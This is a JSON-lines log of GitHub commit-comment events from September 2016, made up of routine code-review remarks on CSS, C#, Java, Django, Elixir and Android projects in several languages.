{"id":"4623974818","type":"CommitCommentEvent","actor":{"login":"yarwest"},"repo":{"name":"surgiie/compean"},"payload":{"comment":{"id":19190026,"position":null,"line":null,"path":null,"commit_id":"ca8b3e25f6bbc3971ee7442c88847abac11559aa","created_at":"2016-09-27T12:54:20Z","updated_at":"2016-09-27T12:54:20Z","body":"xD I think we all have @surgiie "}},"created_at":"2016-09-27T12:54:20Z"}
{"id":"4623976286","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"tonypatryn/relaxr-landing-page"},"payload":{"comment":{"id":19190028,"position":42,"line":42,"path":"css/style.css","commit_id":"d5a9fbf687d50ec966a2d72e0d3c629c266a0f6f","created_at":"2016-09-27T12:54:37Z","updated_at":"2016-09-27T12:54:37Z","body":"This should be \"no-repeat\" (not \"none\")."}},"created_at":"2016-09-27T12:54:37Z"}
{"id":"4623979289","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"7yon/C_SharpCourse"},"payload":{"comment":{"id":19190036,"position":109,"line":87,"path":"TheAreaOfATriangle/TheAreaOfATriangle/Triangle.cs","commit_id":"3c0ed9b27795f1336c0581873c00d639c76550fd","created_at":"2016-09-27T12:55:12Z","updated_at":"2016-09-27T12:55:12Z","body":"Как тут периметр может быть 0?"}},"created_at":"2016-09-27T12:55:12Z"}
{"id":"4623982164","type":"CommitCommentEvent","actor":{"login":"FlxAlbroscheit"},"repo":{"name":"JuliAne/easteasteast"},"payload":{"comment":{"id":19190043,"position":null,"line":null,"path":null,"commit_id":"b87d772462b60f53f02072fba6494f6a4b47caba","created_at":"2016-09-27T12:55:45Z","updated_at":"2016-09-27T12:55:45Z","body":"Fixes #88 "}},"created_at":"2016-09-27T12:55:45Z"}
{"id":"4623983474","type":"CommitCommentEvent","actor":{"login":"pkumar7"},"repo":{"name":"pkumar7/wordcloud"},"payload":{"comment":{"id":19190045,"position":null,"line":null,"path":null,"commit_id":"75be11688c5f304f8e81a61aea6ed6be4490de9f","created_at":"2016-09-27T12:56:00Z","updated_at":"2016-09-27T12:56:00Z","body":"According to django docs:\r\nFirst, create a directory called templates in your polls directory. Django will look for templates in there.\r\n\r\nYour project’s TEMPLATES setting describes how Django will load and render templates. The default settings file configures a DjangoTemplates backend whose APP_DIRS option is set to True. By convention DjangoTemplates looks for a “templates” subdirectory in each of the INSTALLED_APPS. This is how Django knows to find the polls templates even though we didn’t modify the DIRS option, \r\n\r\nSo if you're not adding inside the app and adding inside template, we should add the DIR value properly, it should just be template name. when we give './' or '../' it becomes relative path in code, in that case moving files or restructuring project would be more difficult."}},"created_at":"2016-09-27T12:56:00Z"}
{"id":"4623983492","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190046,"position":5,"line":5,"path":"language-project/dao/.settings/org.eclipse.wst.common.project.facet.core.xml","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T12:56:01Z","updated_at":"2016-09-27T12:56:01Z","body":"желательно не добавлять в удаленный репозиторий служебные файлы среды разработки"}},"created_at":"2016-09-27T12:56:01Z"}
{"id":"4623984144","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19190049,"position":null,"line":null,"path":null,"commit_id":"14af6f2105b07c283a8d8ff44aa916f0a6d367b1","created_at":"2016-09-27T12:56:08Z","updated_at":"2016-09-27T12:56:08Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#bhmjxkCeRBuNBW0e0Z0_Tw"}},"created_at":"2016-09-27T12:56:08Z"}
{"id":"4623987458","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mpullis/relaxr-landing-page"},"payload":{"comment":{"id":19190061,"position":73,"line":73,"path":"css/style.css","commit_id":"205c053319d24acdbf4487658c01c75058b139d6","created_at":"2016-09-27T12:56:48Z","updated_at":"2016-09-27T12:56:48Z","body":"lowercase letters for \"sans-serif\""}},"created_at":"2016-09-27T12:56:48Z"}
{"id":"4623987513","type":"CommitCommentEvent","actor":{"login":"selvakn"},"repo":{"name":"TWChennai/gocd-git-path-material-plugin"},"payload":{"comment":{"id":19190062,"position":4,"line":7,"path":"build.gradle","commit_id":"000348c96dd5dc7d26501b42673261a76a76b929","created_at":"2016-09-27T12:56:49Z","updated_at":"2016-09-27T12:56:49Z","body":"@siliconsenthil : go.cd officially supports jre 1.7. If you want this plugin to reach larger audience, keeping it at 1.7 is required :)"}},"created_at":"2016-09-27T12:56:49Z"}
{"id":"4623989155","type":"CommitCommentEvent","actor":{"login":"burningice2866"},"repo":{"name":"Orckestra/CMS-Foundation"},"payload":{"comment":{"id":19190065,"position":null,"line":null,"path":null,"commit_id":"0dd99039237361aedbc4f5ff4de51f47a5970967","created_at":"2016-09-27T12:57:08Z","updated_at":"2016-09-27T12:57:08Z","body":"A quick \"Format Document\" before saving/committing would be nice in keeping the code style clean."}},"created_at":"2016-09-27T12:57:08Z"}
{"id":"4623989748","type":"CommitCommentEvent","actor":{"login":"saimokkala"},"repo":{"name":"saimokkala/sai"},"payload":{"comment":{"id":19190067,"position":null,"line":null,"path":null,"commit_id":"0b7a5ef945d3d31089f33f735b62cce00e8a4c59","created_at":"2016-09-27T12:57:15Z","updated_at":"2016-09-27T12:57:15Z","body":"files"}},"created_at":"2016-09-27T12:57:15Z"}
{"id":"4623991009","type":"CommitCommentEvent","actor":{"login":"Braidis"},"repo":{"name":"pillarjs/path-to-regexp"},"payload":{"comment":{"id":19190071,"position":null,"line":null,"path":null,"commit_id":"7bbe1ba23ded0848b1d10bcab7504a127359a014","created_at":"2016-09-27T12:57:29Z","updated_at":"2016-09-27T12:57:29Z","body":"7bbe1ba "}},"created_at":"2016-09-27T12:57:29Z"}
{"id":"4623992355","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"7yon/C_SharpCourse"},"payload":{"comment":{"id":19190077,"position":19,"line":19,"path":"TheAreaOfATriangle/FinderSides.Tests/TriangleTest.cs","commit_id":"3c0ed9b27795f1336c0581873c00d639c76550fd","created_at":"2016-09-27T12:57:45Z","updated_at":"2016-09-27T12:57:45Z","body":"У вас же есть юзинг AreaTriangle, тогда из строки можно убирать упоминание AreaTriangle"}},"created_at":"2016-09-27T12:57:45Z"}
{"id":"4623993929","type":"CommitCommentEvent","actor":{"login":"Braidis"},"repo":{"name":"pillarjs/path-to-regexp"},"payload":{"comment":{"id":19190085,"position":null,"line":null,"path":null,"commit_id":"7bbe1ba23ded0848b1d10bcab7504a127359a014","created_at":"2016-09-27T12:58:04Z","updated_at":"2016-09-27T12:58:04Z","body":"7bbe1ba23ded0848b1d10bcab7504a127359a014 \r\n blakeembrey committed on Jun 16 "}},"created_at":"2016-09-27T12:58:04Z"}
{"id":"4623994175","type":"CommitCommentEvent","actor":{"login":"TheSharpieOne"},"repo":{"name":"reactstrap/reactstrap"},"payload":{"comment":{"id":19190086,"position":10,"line":12,"path":".travis.yml","commit_id":"7f4a95f8f9058f286e08bdba3bf12f8873e1cdae","created_at":"2016-09-27T12:58:07Z","updated_at":"2016-09-27T12:58:07Z","body":"Travis already has this predefined "}},"created_at":"2016-09-27T12:58:07Z"}
{"id":"4623994383","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190087,"position":3,"line":15,"path":"language-project/dao/src/main/java/com/dao/utility/DatabaseUtil.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T12:58:09Z","updated_at":"2016-09-27T12:58:09Z","body":"jdbc:mysql://localhost/language_db\r\nroot\r\nroot123\r\nлучше вынести в файл .properties"}},"created_at":"2016-09-27T12:58:09Z"}
{"id":"4623994502","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mpullis/relaxr-landing-page"},"payload":{"comment":{"id":19190088,"position":166,"line":166,"path":"css/style.css","commit_id":"205c053319d24acdbf4487658c01c75058b139d6","created_at":"2016-09-27T12:58:11Z","updated_at":"2016-09-27T12:58:11Z","body":"Instead of using padding, you could've added an inner wrapper to the quote section, set a width on use `margin: 0 auto;` to center it."}},"created_at":"2016-09-27T12:58:11Z"}
{"id":"4623995221","type":"CommitCommentEvent","actor":{"login":"TaraninNA1992"},"repo":{"name":"TaraninNA1992/photo-app"},"payload":{"comment":{"id":19190089,"position":null,"line":null,"path":null,"commit_id":"517c9611ed1a742e982c628b72c4d49a33891dce","created_at":"2016-09-27T12:58:19Z","updated_at":"2016-09-27T12:58:19Z","body":"Commit 27/09"}},"created_at":"2016-09-27T12:58:19Z"}
{"id":"4623995968","type":"CommitCommentEvent","actor":{"login":"saedmansour"},"repo":{"name":"saedmansour/ruby"},"payload":{"comment":{"id":19190090,"position":null,"line":null,"path":null,"commit_id":"55cf412bfdde4cd1145d2ce239a0c54597d49351","created_at":"2016-09-27T12:58:27Z","updated_at":"2016-09-27T12:58:27Z","body":"Was fun digging through the code to do this! 🚢 🚢 ⛵ "}},"created_at":"2016-09-27T12:58:27Z"}
{"id":"4623996833","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mpullis/relaxr-landing-page"},"payload":{"comment":{"id":19190093,"position":175,"line":175,"path":"css/style.css","commit_id":"205c053319d24acdbf4487658c01c75058b139d6","created_at":"2016-09-27T12:58:37Z","updated_at":"2016-09-27T12:58:37Z","body":"Looks like you used a period and not the colon here. Should be `float: left;`."}},"created_at":"2016-09-27T12:58:37Z"}
{"id":"4623997455","type":"CommitCommentEvent","actor":{"login":"Braidis"},"repo":{"name":"pillarjs/path-to-regexp"},"payload":{"comment":{"id":19190096,"position":4,"line":27,"path":"index.js","commit_id":"568a75d1c3791e3fe7f3d09a687e77f24a942682","created_at":"2016-09-27T12:58:44Z","updated_at":"2016-09-27T12:58:44Z","body":"@@ -24,7 +24,7 @@ var PATH_REGEXP = new RegExp([\r\n\r\n\r\n \r\n   // \"/:test(\\\\d+)?\" => [\"/\", \"test\", \"\\d+\", undefined, \"?\", undefined] \r\n\r\n\r\n \r\n   // \"/route(\\\\d+)\"  => [undefined, undefined, undefined, \"\\d+\", undefined, undefined] \r\n\r\n\r\n \r\n   // \"/*\"            => [\"/\", undefined, undefined, undefined, undefined, \"*\"] "}},"created_at":"2016-09-27T12:58:44Z"}
{"id":"4623997890","type":"CommitCommentEvent","actor":{"login":"saedmansour"},"repo":{"name":"saedmansour/ruby"},"payload":{"comment":{"id":19190100,"position":null,"line":null,"path":null,"commit_id":"55cf412bfdde4cd1145d2ce239a0c54597d49351","created_at":"2016-09-27T12:58:49Z","updated_at":"2016-09-27T12:58:49Z","body":"Merge! LGTM! LOL. 😆 "}},"created_at":"2016-09-27T12:58:49Z"}
{"id":"4623998012","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"7yon/C_SharpCourse"},"payload":{"comment":{"id":19190101,"position":69,"line":50,"path":"TheAreaOfATriangle/TheAreaOfATriangle/Triangle.cs","commit_id":"3c0ed9b27795f1336c0581873c00d639c76550fd","created_at":"2016-09-27T12:58:50Z","updated_at":"2016-09-27T12:58:50Z","body":"Лучше message задать для эксепшена"}},"created_at":"2016-09-27T12:58:50Z"}
{"id":"4624000413","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"7yon/C_SharpCourse"},"payload":{"comment":{"id":19190105,"position":73,"line":53,"path":"TheAreaOfATriangle/TheAreaOfATriangle/Triangle.cs","commit_id":"3c0ed9b27795f1336c0581873c00d639c76550fd","created_at":"2016-09-27T12:59:17Z","updated_at":"2016-09-27T12:59:17Z","body":"Он разве нужен public?"}},"created_at":"2016-09-27T12:59:17Z"}
{"id":"4624001057","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"7yon/C_SharpCourse"},"payload":{"comment":{"id":19190107,"position":86,"line":66,"path":"TheAreaOfATriangle/TheAreaOfATriangle/Triangle.cs","commit_id":"3c0ed9b27795f1336c0581873c00d639c76550fd","created_at":"2016-09-27T12:59:25Z","updated_at":"2016-09-27T12:59:25Z","body":"Он разве нужен public?"}},"created_at":"2016-09-27T12:59:25Z"}
{"id":"4624001470","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"7yon/C_SharpCourse"},"payload":{"comment":{"id":19190110,"position":116,"line":91,"path":"TheAreaOfATriangle/TheAreaOfATriangle/Triangle.cs","commit_id":"3c0ed9b27795f1336c0581873c00d639c76550fd","created_at":"2016-09-27T12:59:30Z","updated_at":"2016-09-27T12:59:30Z","body":"Он разве нужен public?"}},"created_at":"2016-09-27T12:59:30Z"}
{"id":"4624002790","type":"CommitCommentEvent","actor":{"login":"darren562"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19190112,"position":36,"line":36,"path":"docs/zh-cn/advanced/transitions.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-27T12:59:45Z","updated_at":"2016-09-27T12:59:45Z","body":" 基于路由的动态过渡"}},"created_at":"2016-09-27T12:59:45Z"}
{"id":"4624003074","type":"CommitCommentEvent","actor":{"login":"xiasf"},"repo":{"name":"xiasf/github-note"},"payload":{"comment":{"id":19190113,"position":null,"line":null,"path":null,"commit_id":"f3e3bb8deb01f49b4f7d9debbc5a584de1078090","created_at":"2016-09-27T12:59:48Z","updated_at":"2016-09-27T12:59:48Z","body":"哈哈"}},"created_at":"2016-09-27T12:59:48Z"}
{"id":"4624005234","type":"CommitCommentEvent","actor":{"login":"TheSharpieOne"},"repo":{"name":"reactstrap/reactstrap"},"payload":{"comment":{"id":19190116,"position":5,"line":8,"path":".travis.yml","commit_id":"7f4a95f8f9058f286e08bdba3bf12f8873e1cdae","created_at":"2016-09-27T13:00:12Z","updated_at":"2016-09-27T13:00:12Z","body":"Wasn't too sure why you were doing this. Node 6 has npm 3. Does it absolutely have to be the latest version? Seems like such a requirement would affect development. "}},"created_at":"2016-09-27T13:00:12Z"}
{"id":"4624008312","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mpullis/relaxr-landing-page"},"payload":{"comment":{"id":19190129,"position":42,"line":42,"path":"index.html","commit_id":"205c053319d24acdbf4487658c01c75058b139d6","created_at":"2016-09-27T13:00:44Z","updated_at":"2016-09-27T13:00:44Z","body":"hmm, this should be in your style.css (which means this div would need a class or id)"}},"created_at":"2016-09-27T13:00:44Z"}
{"id":"4624010992","type":"CommitCommentEvent","actor":{"login":"bobapple"},"repo":{"name":"Icinga/puppet-icinga2-rewrite"},"payload":{"comment":{"id":19190132,"position":123,"line":183,"path":"manifests/feature/api.pp","commit_id":"fc6b71da774ffa148c87fa6747ef4a2993867749","created_at":"2016-09-27T13:01:12Z","updated_at":"2016-09-27T13:01:12Z","body":"Thanks Reamer\r\nIssue: https://dev.icinga.org/issues/12809"}},"created_at":"2016-09-27T13:01:12Z"}
{"id":"4624012312","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190134,"position":5,"line":14,"path":"language-project/dao/src/main/java/com/language/dao/UserDao.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:01:28Z","updated_at":"2016-09-27T13:01:28Z","body":"в основном используют слово update а не alter\r\nТебе точно нужно передавать в параметрах User user или достаточно будет int id  ?"}},"created_at":"2016-09-27T13:01:28Z"}
{"id":"4624015146","type":"CommitCommentEvent","actor":{"login":"ChakreshwarSharma-BTC"},"repo":{"name":"ChakreshwarSharma-BTC/agent-assist"},"payload":{"comment":{"id":19190143,"position":7,"line":5,"path":"app/assets/javascripts/common.js","commit_id":"115a7f4e428e31fac4eacfd18676738ac102cd13","created_at":"2016-09-27T13:02:00Z","updated_at":"2016-09-27T13:02:00Z","body":"@GauravMakwana-BTC : Spacing issue"}},"created_at":"2016-09-27T13:02:00Z"}
{"id":"4624017227","type":"CommitCommentEvent","actor":{"login":"ChakreshwarSharma-BTC"},"repo":{"name":"ChakreshwarSharma-BTC/agent-assist"},"payload":{"comment":{"id":19190146,"position":8,"line":6,"path":"app/assets/javascripts/common.js","commit_id":"115a7f4e428e31fac4eacfd18676738ac102cd13","created_at":"2016-09-27T13:02:24Z","updated_at":"2016-09-27T13:02:24Z","body":"@GauravMakwana-BTC : Spacing issue"}},"created_at":"2016-09-27T13:02:24Z"}
{"id":"4624017882","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19190147,"position":null,"line":null,"path":null,"commit_id":"817cdbbf850a7be10f85841b118f1b4feb5177b9","created_at":"2016-09-27T13:02:31Z","updated_at":"2016-09-27T13:02:31Z","body":"Speed is worth a lot in STC tests. Good luck!"}},"created_at":"2016-09-27T13:02:31Z"}
{"id":"4624018554","type":"CommitCommentEvent","actor":{"login":"ChakreshwarSharma-BTC"},"repo":{"name":"ChakreshwarSharma-BTC/agent-assist"},"payload":{"comment":{"id":19190150,"position":12,"line":10,"path":"app/assets/javascripts/common.js","commit_id":"115a7f4e428e31fac4eacfd18676738ac102cd13","created_at":"2016-09-27T13:02:38Z","updated_at":"2016-09-27T13:02:38Z","body":"@GauravMakwana-BTC : Spacing issue , fix, it all other places"}},"created_at":"2016-09-27T13:02:38Z"}
{"id":"4624019112","type":"CommitCommentEvent","actor":{"login":"paulmillr"},"repo":{"name":"paulmillr/chokidar"},"payload":{"comment":{"id":19190151,"position":26,"line":268,"path":"README.md","commit_id":"f17186dff7b27c67b17a644c333cc239b42827ba","created_at":"2016-09-27T13:02:45Z","updated_at":"2016-09-27T13:02:45Z","body":"fixed"}},"created_at":"2016-09-27T13:02:45Z"}
{"id":"4624019532","type":"CommitCommentEvent","actor":{"login":"jlambe"},"repo":{"name":"themosis/framework"},"payload":{"comment":{"id":19190153,"position":null,"line":null,"path":null,"commit_id":"8becbe71046f583664accb3905b1d1dccda36a5a","created_at":"2016-09-27T13:02:50Z","updated_at":"2016-09-27T13:02:50Z","body":"Finally 😄 "}},"created_at":"2016-09-27T13:02:50Z"}
{"id":"4624020428","type":"CommitCommentEvent","actor":{"login":"nwise"},"repo":{"name":"ElixirCLE/nemestats_client"},"payload":{"comment":{"id":19190156,"position":null,"line":null,"path":null,"commit_id":"716941124ba9da5c390977d1583b285a385f62f3","created_at":"2016-09-27T13:03:00Z","updated_at":"2016-09-27T13:03:00Z","body":"+1 For using Poison, exjsx looks like it's been quite a while since it's had any commits.\r\n\r\nJust lurking here, but I jumped in console and here's what I got using Poison:\r\n\r\n```iex(2)> {:ok, body} = %{\"userName\": \"wisen\", \"password\": \"XXX\"} |> Poison.encode\r\n{:ok, \"{\\\"userName\\\":\\\"wisen\\\",\\\"password\\\":\\\"XXX\\\"}\"}\r\niex(3)> body\r\n\"{\\\"userName\\\":\\\"wisen\\\",\\\"password\\\":\\\"XXX\\\"}\"\r\niex(4)> HTTPoison.request(:post, \"https://nemestats.com/api/v2/UserSessions/\", body, [{\"Content-Type\", \"application/json\"}, {\"Accept\", \"application/json\"}])\r\n{:ok,\r\n %HTTPoison.Response{body: \"{\\\"authenticationToken\\\":\\\"2040948d-f49b-4784-8e94-a3dd2b5a3ffa\\\",\\\"authenticationTokenExpirationDateTime\\\":\\\"2016-12-27T12:56:04.427\\\"}\",\r\n  headers: [{\"Date\", \"Tue, 27 Sep 2016 13:01:02 GMT\"},\r\n   {\"Content-Type\", \"application/json; charset=utf-8\"},\r\n   {\"Transfer-Encoding\", \"chunked\"}, {\"Connection\", \"keep-alive\"},\r\n   {\"Set-Cookie\",\r\n    \"__cfduid=d62e5a42dbf3fcb24c55e50a3792848e11474981262; expires=Wed, 27-Sep-17 13:01:02 GMT; path=/; domain=.nemestats.com; HttpOnly\"},\r\n   {\"Cache-Control\", \"no-cache\"}, {\"Pragma\", \"no-cache\"}, {\"Expires\", \"-1\"},\r\n   {\"Vary\", \"Accept-Encoding\"}, {\"X-AspNet-Version\", \"4.0.30319\"},\r\n   {\"X-Powered-By\", \"ASP.NET\"},\r\n   {\"Set-Cookie\",\r\n    \"ARRAffinity=f5e3ec32b7b8f8b8994de193698aa9f29deaffc69a6f03b1581f9d27e3521fba;Path=/;Domain=nemestats.com\"},\r\n   {\"Server\", \"cloudflare-nginx\"}, {\"CF-RAY\", \"2e8f24588d675510-ORD\"}],\r\n  status_code: 200}}\r\niex(5)>"}},"created_at":"2016-09-27T13:03:00Z"}
{"id":"4624020539","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"thesuss/sf-online-august"},"payload":{"comment":{"id":19190157,"position":null,"line":null,"path":null,"commit_id":"e527b5cef7637d95c88521034d4ae8fb10743acd","created_at":"2016-09-27T13:03:01Z","updated_at":"2016-09-27T13:03:01Z","body":"And we have code coverage!! Good job!"}},"created_at":"2016-09-27T13:03:01Z"}
{"id":"4624020753","type":"CommitCommentEvent","actor":{"login":"xiasf"},"repo":{"name":"xiasf/github-note"},"payload":{"comment":{"id":19190158,"position":1,"line":1,"path":"README.md","commit_id":"f3e3bb8deb01f49b4f7d9debbc5a584de1078090","created_at":"2016-09-27T13:03:04Z","updated_at":"2016-09-27T13:03:04Z","body":"这是什么？"}},"created_at":"2016-09-27T13:03:04Z"}
{"id":"4624022633","type":"CommitCommentEvent","actor":{"login":"ChakreshwarSharma-BTC"},"repo":{"name":"ChakreshwarSharma-BTC/agent-assist"},"payload":{"comment":{"id":19190161,"position":2,"line":2,"path":"app/helpers/application_helper.rb","commit_id":"115a7f4e428e31fac4eacfd18676738ac102cd13","created_at":"2016-09-27T13:03:25Z","updated_at":"2016-09-27T13:03:25Z","body":"@GauravMakwana-BTC : Spacing issue"}},"created_at":"2016-09-27T13:03:25Z"}
{"id":"4624022850","type":"CommitCommentEvent","actor":{"login":"fashioncj"},"repo":{"name":"CyanogenMod/android_device_motorola_thea"},"payload":{"comment":{"id":19190162,"position":null,"line":null,"path":null,"commit_id":"74a0e4b901ad09c516df951ccf6b2ea278c7ae08","created_at":"2016-09-27T13:03:28Z","updated_at":"2016-09-27T13:03:28Z","body":"An error on Email APP(seem that exchange)\r\n--\r\n 20:57:11.741 2607-2667/? E/SQLiteLog: (1) no such column: setSyncSizeEnabled\r\n09-27 20:57:11.779 2607-2667/? E/AndroidRuntime: FATAL EXCEPTION: AsyncTask #2\r\n                                                 Process: com.android.email, PID: 2607\r\n                                                 java.lang.RuntimeException: An error occurred while executing doInBackground()\r\n                                                     at android.os.AsyncTask$3.done(AsyncTask.java:318)\r\n                                                     at java.util.concurrent.FutureTask.finishCompletion(FutureTask.java:354)\r\n                                                     at java.util.concurrent.FutureTask.setException(FutureTask.java:223)\r\n                                                     at java.util.concurrent.FutureTask.run(FutureTask.java:242)\r\n                                                     at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1133)\r\n                                                     at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:607)\r\n                                                     at java.lang.Thread.run(Thread.java:761)\r\n                                                  Caused by: android.database.sqlite.SQLiteException: no such column: setSyncSizeEnabled (code 1): , while compiling: SELECT _id, displayName, emailAddress, syncKey, syncLookback, syncInterval, hostAuthKeyRecv, hostAuthKeySend, flags, senderName, ringtoneUri, protocolVersion, securitySyncKey, signature, policyKey, pingDuration, maxAttachmentSize, setSyncSizeEnabled, syncSize, capabilities FROM Account\r\n                                                     at android.database.sqlite.SQLiteConnection.nativePrepareStatement(Native Method)\r\n                                                     at android.database.sqlite.SQLiteConnection.acquirePreparedStatement(SQLiteConnection.java:889)\r\n                                                     at android.database.sqlite.SQLiteConnection.prepare(SQLiteConnection.java:500)\r\n                                                     at android.database.sqlite.SQLiteSession.prepare(SQLiteSession.java:588)\r\n                                                     at android.database.sqlite.SQLiteProgram.<init>(SQLiteProgram.java:58)\r\n                                                     at android.database.sqlite.SQLiteQuery.<init>(SQLiteQuery.java:37)\r\n                                                     at android.database.sqlite.SQLiteDirectCursorDriver.query(SQLiteDirectCursorDriver.java:44)\r\n                                                     at android.database.sqlite.SQLiteDatabase.rawQueryWithFactory(SQLiteDatabase.java:1318)\r\n                                                     at android.database.sqlite.SQLiteDatabase.queryWithFactory(SQLiteDatabase.java:1165)\r\n                                                     at android.database.sqlite.SQLiteDatabase.query(SQLiteDatabase.java:1036)\r\n                                                     at android.database.sqlite.SQLiteDatabase.query(SQLiteDatabase.java:1242)\r\n                                                     at com.android.email.provider.EmailProvider.query(EmailProvider.java:1469)\r\n                                                     at android.content.ContentProvider.query(ContentProvider.java:1020)\r\n                                                     at android.content.ContentProvider$Transport.query(ContentProvider.java:239)\r\n                                                     at android.content.ContentResolver.query(ContentResolver.java:532)\r\n                                                     at android.content.ContentResolver.query(ContentResolver.java:473)\r\n                                                     at com.android.email.provider.AccountReconciler.getAllEmailProviderAccounts(AccountReconciler.java:80)\r\n                                                     at com.android.email.provider.AccountReconciler.reconcileAccounts(AccountReconciler.java:114)\r\n                                                     at com.android.email.provider.EmailProvider$2.run(EmailProvider.java:408)\r\n                                                     at com.android.emailcommon.utility.EmailAsyncTask$1.doInBackground(EmailAsyncTask.java:250)\r\n                                                     at com.android.emailcommon.utility.EmailAsyncTask$1.doInBackground(EmailAsyncTask.java:249)\r\n                                                     at com.android.emailcommon.utility.EmailAsyncTask$InnerTask.doInBackground(EmailAsyncTask.java:121)\r\n                                                     at android.os.AsyncTask$2.call(AsyncTask.java:304)\r\n                                                     at java.util.concurrent.FutureTask.run(FutureTask.java:237)\r\n                                                     at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1133) \r\n                                                     at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:607) \r\n                                                     at java.lang.Thread.run(Thread.java:761) \r\n09-27 20:57:11.855 2607-2695/? E/SQLiteLog: (1) no such column: setSyncSizeEnabled\r\n---"}},"created_at":"2016-09-27T13:03:28Z"}
{"id":"4624023302","type":"CommitCommentEvent","actor":{"login":"darren562"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19190164,"position":3,"line":3,"path":"docs/zh-cn/advanced/data-fetching.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-27T13:03:33Z","updated_at":"2016-09-27T13:03:33Z","body":"有时候，当你使用路由时"}},"created_at":"2016-09-27T13:03:33Z"}
{"id":"4624023311","type":"CommitCommentEvent","actor":{"login":"xiasf"},"repo":{"name":"xiasf/github-note"},"payload":{"comment":{"id":19190165,"position":1,"line":1,"path":"README.md","commit_id":"f3e3bb8deb01f49b4f7d9debbc5a584de1078090","created_at":"2016-09-27T13:03:33Z","updated_at":"2016-09-27T13:03:33Z","body":"我怎么知道？"}},"created_at":"2016-09-27T13:03:33Z"}
{"id":"4624027543","type":"CommitCommentEvent","actor":{"login":"fjlopez"},"repo":{"name":"dbarelop/lab1-git-race"},"payload":{"comment":{"id":19190179,"position":null,"line":null,"path":null,"commit_id":"84a56f4787b5a6156284ddb14fc97e2625aaec3a","created_at":"2016-09-27T13:04:20Z","updated_at":"2016-09-27T13:04:20Z","body":":+1: less technical debt!"}},"created_at":"2016-09-27T13:04:20Z"}
{"id":"4624028838","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190182,"position":25,"line":25,"path":"language-project/dao/src/main/java/com/language/daoImpl/Test.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:04:34Z","updated_at":"2016-09-27T13:04:34Z","body":"лучше избегать таких коротких названия методов"}},"created_at":"2016-09-27T13:04:34Z"}
{"id":"4624028966","type":"CommitCommentEvent","actor":{"login":"ssm"},"repo":{"name":"munin-monitoring/munin-monitoring.github.io"},"payload":{"comment":{"id":19190183,"position":null,"line":null,"path":null,"commit_id":"024f5fc0340029b0772a724f287257d85cfe6420","created_at":"2016-09-27T13:04:35Z","updated_at":"2016-09-27T13:04:35Z","body":"From my perspective, it is.  I use it to hint crawlers not to hit certain parts of the website, or to ask for rate limiting to not overload the backend.  That is especially important when running dynamic backends which have to generate content for each request, and to maintain a high hit ratio in the cache.\r\n\r\nThe blanket ban in the file I removed prevented me from running tools like \"linkchecker\", which checks and respects robots.txt before requesting each page for content analysis."}},"created_at":"2016-09-27T13:04:35Z"}
{"id":"4624030567","type":"CommitCommentEvent","actor":{"login":"marten"},"repo":{"name":"camallen/Panoptes"},"payload":{"comment":{"id":19190185,"position":7,"line":155,"path":"lib/formatter/csv/annotation_for_csv.rb","commit_id":"9587c7feaa5b6fa18bf836be6faebcb3d218547e","created_at":"2016-09-27T13:04:53Z","updated_at":"2016-09-27T13:04:53Z","body":"Isn't annotation just a hash? "}},"created_at":"2016-09-27T13:04:53Z"}
{"id":"4624031346","type":"CommitCommentEvent","actor":{"login":"Vijaya333"},"repo":{"name":"requirejs/example-jquery-cdn"},"payload":{"comment":{"id":19190188,"position":8,"line":11,"path":"www/js/lib/require.js","commit_id":"82b39e4203db04b4ac7e1316eb9de64b399b8614","created_at":"2016-09-27T13:05:01Z","updated_at":"2016-09-27T13:05:01Z","body":"ok\r\n"}},"created_at":"2016-09-27T13:05:01Z"}
